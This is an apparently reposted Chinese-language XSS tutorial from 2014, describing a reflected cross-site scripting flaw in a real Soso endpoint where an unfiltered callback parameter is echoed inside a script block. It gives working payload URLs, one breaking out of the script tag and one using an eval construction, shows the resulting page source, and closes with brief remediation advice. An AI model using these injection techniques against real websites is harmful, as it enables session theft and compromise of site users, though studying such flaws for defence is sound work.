记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

xss实例-输出在之间的情况

2014-03-18 17:20

 1. 我们找到这么一个点,也是输入和输出都未过滤的一个点。相比教程第一例,其特殊之处在于,是输出在了 <script>[输出]</script>之间。


http://activity.soso.com/common/setParentsInfo.php?callback=aaaaaaaaa如下图:callback参数未做过滤。 在【查看源代码】下,我们可以看到。

\

缺陷网页源代码:


<script type='text/javascript'>document.domain='soso.com';_ret={"_res":2};try{parent.aaa(_ret);}catch(err){aaa(_ret);}</script>

2. 碰到这种情况,我们一般有以下解法。

2.1 首先判断,是否过滤了 < , > , / 等符号,

2.2 如果都没有过滤,恭喜你,一般可以直接XSS了。代码如下:http://activity.soso.com/common/setParentsInfo.php?callback=aaaaaaaaa</script><script>alert(1)</script> 原理入下图:

\


构造callback参数后的源代码

<script type='text/javascript'>document.domain='soso.com';_ret={"_res":2};try{parent.aaaaaaaaa</script><script>alert(1)</script>(_ret);}catch(err){aaaaaaaaa</script><script>alert(1)</script>(_ret);}</script>

2.3 如果过滤了 <, >,那么就无法使用上面的办法了。我们接着看 3 
3. script代码里的构造。 
友情提示:这里可能需要一点点 javascript 的知识才行哦~~ 
我们可以如下构造: 


http://activity.soso.com/common/setParentsInfo.php?callback=eval('alert(1)');void


可以看到,源代码是下面的样子。

\

也就是说,我们插入的内容,使得这一段javascript依然【语法正确】,能够【正确执行】,并且能够执行【我们所插入的JS代码】,这样我们的目的就达到了。 
构造后的源代码如下: 


<script type='text/javascript'>document.domain='soso.com';_ret={"_res":2};try{parent.eval('alert(1)');void(_ret);}catch(err){eval('alert(1)');void(_ret);}</script>


4. 这种输出在JS代码里的情况十分常见,但是呢?不幸的是,像这样没过滤的情况,却不是很常见。例如: 
var a="[输出]"; // 通常程序员会把 " 过滤掉, 这样的话,一般来说,我们就很难构造。 
但是,这并不是说,就一定是不能利用,后面我们会拿腾讯一些【比较有意思】的例子,来进一步说到 这个【输出在js里】的情况的~ 

修复方案:

这类XSS的模型通常是: 
<script>...[输出]...</script> 
<style>...[输出]...</script> 
解决方案: 
1. 过滤 </xxx> 组合 
2. 针对输出在不同的场景,进行合适的过滤。

知识来源: www.2cto.com/Article/201403/285983.html

阅读:77073 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“xss实例-输出在之间的情况”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云